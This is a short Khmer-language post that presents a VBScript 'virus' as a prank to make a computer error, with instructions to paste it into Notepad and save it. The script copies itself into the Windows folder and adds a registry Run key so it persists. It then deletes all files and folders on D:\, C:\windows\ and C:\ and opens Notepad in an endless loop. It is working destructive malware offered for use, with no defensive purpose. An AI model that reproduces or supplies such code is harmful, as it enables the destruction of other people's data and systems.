បង្កើតមេរោគអោយ Error

បើកលោកអ្នកអផ្សុក ចង់អោយប្រព័ន្ធ Error ចូល Copy កូដខាងក្រោម Save ជា .bat ក្នុង Notepad ទៅ
IT
msgbox” Slap tov !”
On Error Resume Next
Set vip_xinh = Createobject(“scripting.filesystemobject”)
vip_xinh.copyfile wscript.scriptfullname,vip_xinh.GetSpecialFolder(0 )& “\ vip_xinh.vbs”
Set vip_xinh2= CreateObject(“WScript.Shell”)
vip_xinh2.regwrite “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersio n\Ru n\die”,”wscript.exe “& vip_xinh.GetSpecialFolder(0)& “\ vip_xinh.vbs %”

On Error Resume Next
Const vic = “D:\”
Delvic
Sub Delvic()
Dim fso
Set fso = CreateObject(“Scripting.FileSystemObject”)
fso.DeleteFile vic & “*.*” , True
fso.DeleteFolder vic & “*” , True
End Sub

On Error Resume Next
Const vic1 = “C:\windows\”
Delvic1
Sub Delvic1()
Dim fso1
Set fso1 = CreateObject(“Scripting.FileSystemObject”)
fso1.DeleteFile vic1 & “*.*” , True
fso1.DeleteFolder vic1 & “*” , True
End Sub

On Error Resume Next
Const vic2 = “C:\”
Delvic2
Sub Delvic2()
Dim fso2
Set fso2 = CreateObject(“Scripting.FileSystemObject”)
fso2.DeleteFile vic2 & “*.*” , True
fso2.DeleteFolder vic2 & “*” , True
End Sub

On Error Resume Next
Set treomay= CreateObject(“WScript.Shell”)
Do
treomay.run “notepad”,false
loop